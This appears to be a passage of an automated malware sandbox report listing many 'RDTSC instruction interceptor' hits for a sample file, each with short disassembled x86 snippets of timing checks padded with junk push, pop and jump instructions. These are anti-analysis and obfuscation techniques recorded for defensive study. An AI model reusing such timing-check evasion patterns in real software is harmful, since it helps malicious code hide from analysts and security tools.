                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 222DAB second address: 222DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FB3E0C7B6A9h 0x0000000f pop edi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 222DD2 second address: 222DD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 222DD8 second address: 222DDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29F579 second address: 29F589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB3E1482E8Ch 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 273C6A second address: 273C74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FB3E0C7B696h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 274136 second address: 27413D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27413D second address: 27415D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FB3E0C7B696h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 jp 00007FB3E0C7B698h 0x00000016 push eax 0x00000017 push edx 0x00000018 jno 00007FB3E0C7B696h 0x0000001e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2741FA second address: 2741FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2742C1 second address: 2742CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 274314 second address: 274318 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 274318 second address: 274339 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB3E0C7B696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB3E0C7B6A5h 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 274339 second address: 27435E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007FB3E1482E99h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27444C second address: 274479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jno 00007FB3E0C7B696h 0x0000000c jng 00007FB3E0C7B696h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 jnp 00007FB3E0C7B69Eh 0x0000001b push eax 0x0000001c jc 00007FB3E0C7B696h 0x00000022 pop eax 0x00000023 mov eax, dword ptr [esp+04h] 0x00000027 push eax 0x00000028 push edx 0x00000029 push ebx 0x0000002a pushad 0x0000002b popad 0x0000002c pop ebx 0x0000002d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 274479 second address: 274491 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB3E1482E88h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007FB3E1482E8Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 274491 second address: 274495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27466A second address: 274670 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 274A53 second address: 274A57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 274DC2 second address: 274DDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007FB3E1482E86h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 274DDA second address: 253D32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB3E0C7B69Eh 0x0000000a popad 0x0000000b nop 0x0000000c call 00007FB3E0C7B6A4h 0x00000011 mov ecx, dword ptr [ebp+122D26A1h] 0x00000017 pop ecx 0x00000018 lea eax, dword ptr [ebp+12488A5Fh] 0x0000001e push 00000000h 0x00000020 push edi 0x00000021 call 00007FB3E0C7B698h 0x00000026 pop edi 0x00000027 mov dword ptr [esp+04h], edi 0x0000002b add dword ptr [esp+04h], 0000001Ah 0x00000033 inc edi 0x00000034 push edi 0x00000035 ret 0x00000036 pop edi 0x00000037 ret 0x00000038 push eax 0x00000039 jmp 00007FB3E0C7B6A7h 0x0000003e mov dword ptr [esp], eax 0x00000041 mov cx, ax 0x00000044 lea eax, dword ptr [ebp+12488A1Bh] 0x0000004a sub dword ptr [ebp+122D2633h], edx 0x00000050 push eax 0x00000051 push edi 0x00000052 push ebx 0x00000053 push esi 0x00000054 pop esi 0x00000055 pop ebx 0x00000056 pop edi 0x00000057 mov dword ptr [esp], eax 0x0000005a jp 00007FB3E0C7B69Ah 0x00000060 mov cx, 0B2Ch 0x00000064 jc 00007FB3E0C7B69Ch 0x0000006a mov dword ptr [ebp+122D1D9Ah], edx 0x00000070 call dword ptr [ebp+122D5789h] 0x00000076 push eax 0x00000077 push edx 0x00000078 jmp 00007FB3E0C7B6A3h 0x0000007d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29FA39 second address: 29FA3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29FA3F second address: 29FA4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29FBEC second address: 29FC03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FB3E1482E91h 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29FC03 second address: 29FC18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b je 00007FB3E0C7B69Eh 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29FD98 second address: 29FD9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29FF34 second address: 29FF3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29FF3A second address: 29FF48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB3E1482E8Ah 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A00CD second address: 2A00D6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A6CCB second address: 2A6CD3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A6CD3 second address: 2A6CE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jbe 00007FB3E0C7B696h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A6CE0 second address: 2A6CEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 je 00007FB3E1482E86h 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A56B0 second address: 2A56B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A56B4 second address: 2A56BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A56BA second address: 2A56C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A56C4 second address: 2A56E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB3E1482E98h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A56E0 second address: 2A56EA instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB3E0C7B696h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A56EA second address: 2A56F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A56F0 second address: 2A5729 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB3E0C7B69Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FB3E0C7B6A1h 0x00000014 pushad 0x00000015 popad 0x00000016 push edx 0x00000017 pop edx 0x00000018 popad 0x00000019 jns 00007FB3E0C7B69Eh 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A65F7 second address: 2A65FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A65FD second address: 2A662E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnl 00007FB3E0C7B6A3h 0x0000000b popad 0x0000000c push esi 0x0000000d jc 00007FB3E0C7B69Ch 0x00000013 ja 00007FB3E0C7B696h 0x00000019 pushad 0x0000001a push eax 0x0000001b pop eax 0x0000001c jl 00007FB3E0C7B696h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AF3E6 second address: 2AF3EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AE711 second address: 2AE733 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E0C7B6A4h 0x00000007 jg 00007FB3E0C7B696h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AEB19 second address: 2AEB6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007FB3E1482E98h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FB3E1482E91h 0x00000016 jc 00007FB3E1482EA3h 0x0000001c jmp 00007FB3E1482E97h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AEB6D second address: 2AEB71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AEB71 second address: 2AEB76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AECEE second address: 2AED09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E0C7B6A5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2ADC87 second address: 2ADC8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2ADC8B second address: 2ADC91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2ADC91 second address: 2ADC97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2ADC97 second address: 2ADCBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB3E0C7B69Eh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esi 0x0000000e jmp 00007FB3E0C7B69Ch 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B6985 second address: 2B6991 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jno 00007FB3E1482E86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B6991 second address: 2B69BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB3E0C7B69Bh 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007FB3E0C7B6A9h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B6403 second address: 2B640B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B6572 second address: 2B6595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB3E0C7B6A4h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B6595 second address: 2B65A0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jc 00007FB3E1482E86h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B6703 second address: 2B6738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB3E0C7B6A4h 0x00000009 jmp 00007FB3E0C7B69Ah 0x0000000e popad 0x0000000f pushad 0x00000010 jmp 00007FB3E0C7B69Fh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B6738 second address: 2B673E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B8E06 second address: 2B8E12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB3E0C7B696h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B89C5 second address: 2B89D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jne 00007FB3E1482E86h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BCC55 second address: 2BCC59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BCC59 second address: 2BCC81 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB3E1482E99h 0x0000000b pushad 0x0000000c jo 00007FB3E1482E86h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BC428 second address: 2BC42C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BC42C second address: 2BC449 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FB3E1482E86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FB3E1482E8Ch 0x00000011 pushad 0x00000012 push esi 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C0E2B second address: 2C0E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jnp 00007FB3E0C7B696h 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C0E3C second address: 2C0E54 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB3E1482E8Dh 0x0000000b popad 0x0000000c pushad 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C0E54 second address: 2C0E61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jc 00007FB3E0C7B69Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C0E61 second address: 2C0E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007FB3E1482E93h 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C73F8 second address: 2C7414 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB3E0C7B696h 0x00000008 jmp 00007FB3E0C7B69Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C5D00 second address: 2C5D06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C5D06 second address: 2C5D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C6700 second address: 2C6708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C6708 second address: 2C670E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CF9AD second address: 2CF9C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E1482E90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CF9C5 second address: 2CF9DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jns 00007FB3E0C7B696h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 jnp 00007FB3E0C7B6A2h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CF9DE second address: 2CF9E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 21DCCD second address: 21DCE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB3E0C7B6A1h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 21DCE2 second address: 21DCE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CD977 second address: 2CD982 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CD982 second address: 2CD988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CDAEB second address: 2CDAFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jp 00007FB3E0C7B696h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CE7F4 second address: 2CE834 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E1482E90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FB3E1482E93h 0x0000000f pushad 0x00000010 jmp 00007FB3E1482E95h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CE834 second address: 2CE83C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CE83C second address: 2CE842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CE842 second address: 2CE858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB3E0C7B69Dh 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CEB21 second address: 2CEB25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CEB25 second address: 2CEB36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007FB3E0C7B696h 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CEB36 second address: 2CEB3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CEDD3 second address: 2CEDD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CEDD7 second address: 2CEE10 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FB3E1482E98h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB3E1482E99h 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CF0E9 second address: 2CF0ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
